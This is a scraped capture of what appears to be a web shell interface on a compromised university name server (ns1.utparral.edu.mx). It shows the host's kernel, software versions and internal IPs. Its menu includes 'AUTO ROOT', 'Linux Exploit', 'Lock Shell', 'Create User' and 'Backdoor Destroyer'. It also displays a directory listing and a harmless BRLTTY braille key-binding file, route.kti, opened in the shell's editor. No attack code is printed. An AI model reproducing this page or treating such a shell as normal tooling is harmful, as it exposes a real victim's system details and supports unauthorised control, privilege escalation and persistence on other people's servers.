Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
etc /
brltty /
Input /
ic /
[ HOME SHELL ]
Name
Size
Permission
Action
bb.ktb
1.16
KB
-rw-r--r--
chords.kti
2.81
KB
-rw-r--r--
common.kti
1.71
KB
-rw-r--r--
nvda.ktb
1.94
KB
-rw-r--r--
route.kti
1.84
KB
-rw-r--r--
toggle.kti
949
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : route.kti
############################################################################### # BRLTTY - A background process providing access to the console screen (when in # text mode) for a blind person using a refreshable braille display. # # Copyright (C) 1995-2021 by The BRLTTY Developers. # # BRLTTY comes with ABSOLUTELY NO WARRANTY. # # This is free software, placed under the terms of the # GNU Lesser General Public License, as published by the Free Software # Foundation; either version 2.1 of the License, or (at your option) any # later version. Please see the file LICENSE-LGPL for details. # # Web Page: http://brltty.app/ # # This software is maintained by Dave Mielke <dave@mielke.cc>. ############################################################################### context routingKeys bind RoutingKey KEY_FUNCTION bind Dot1 CONTEXT+clipNew bind Dot2 CONTEXT+clipAdd bind Dot4 CONTEXT+copyLinear bind Dot5 CONTEXT+copyRectangular bind Dot3 CONTEXT+setLeft bind Dot6 CONTEXT+describeCharacter bind Dot7 CONTEXT+setMark bind Dot8 CONTEXT+goToMark bind Space CONTEXT+switchVirtualTerminal bind MoveUp CONTEXT+upSameIndent bind MoveDown CONTEXT+downSameIndent bind PanLeft CONTEXT+upDifferentCharacter bind PanRight CONTEXT+downDifferentCharacter context clipNew bind RoutingKey CLIP_NEW context clipAdd bind RoutingKey CLIP_ADD context copyLinear bind RoutingKey COPY_LINE context copyRectangular bind RoutingKey COPY_RECT context setLeft bind RoutingKey SETLEFT context describeCharacter bind RoutingKey DESCCHAR context setMark bind RoutingKey SETMARK context goToMark bind RoutingKey GOTOMARK context switchVirtualTerminal bind RoutingKey SWITCHVT context upSameIndent bind RoutingKey PRINDENT context downSameIndent bind RoutingKey NXINDENT context upDifferentCharacter bind RoutingKey PRDIFCHAR context downDifferentCharacter bind RoutingKey NXDIFCHAR
Close